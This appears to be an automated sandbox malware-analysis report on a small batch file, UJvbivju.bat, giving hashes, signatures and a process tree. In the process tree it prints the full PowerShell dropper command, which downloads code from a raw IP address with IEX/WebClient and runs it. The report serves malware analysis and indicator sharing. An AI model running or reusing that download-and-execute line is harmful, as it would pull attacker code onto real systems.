Analysis
Max time kernel: 108s
Max time network: 142s
Platform: windows10_x64
Resource: win10v200217
Submitted: 04-03-2020 16:10
Tasks
Static task: static1
Behavioral task: behavioral1 | Sample: UJvbivju.bat | Resource: win7v200217 (windows7_x64) | 0 signatures | 0 seconds
Behavioral task: behavioral2 | Sample: UJvbivju.bat | Resource: win10v200217 (windows10_x64) | 0 signatures | 0 seconds
General
Target: UJvbivju.bat
Size: 189B
MD5: 30e9f006bd27f61b87649fb861b70525
SHA1: 602c170aa87ed68a7c5f68f15a162bdbd51dfc1f
SHA256: c27c8d9ea31e707420a5f77581ead62b943e9195989ff1d5df30d0ecafefe2e6
SHA512: f9c62d8bff196da519b3c336d079781f33cdd0123f910448d9b8be41b732b149dbbed44e1bdb58ebf67d914ae4ec0d376ac16688851ea6714a21cf638a6cd7ae
Score: 10/10
Malware Config
Extracted
Language: ps1
Source: ps1.dropper
URLs: http://185.103.242.78/pastes/UJvbivju
Signatures
Program crash (1 IoC)
Processes: WerFault.exe
pid | pid_target | process | target process
3156 | 3696 | WerFault.exe | powershell.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes: WerFault.exe
description | pid | process
Token: SeRestorePrivilege | 3156 | WerFault.exe
Token: SeBackupPrivilege | 3156 | WerFault.exe
Token: SeDebugPrivilege | 3156 | WerFault.exe
Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes: WerFault.exe
pid | process
3156 | WerFault.exe (14 identical entries)
Processes
1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\UJvbivju.bat"
   PID: 2416
  2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
     Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/UJvbivju');Invoke-QGTRJX;Start-Sleep -s 10000"
     PID: 3696
    3. C:\Windows\SysWOW64\WerFault.exe
       Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 704
       Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses
       PID: 3156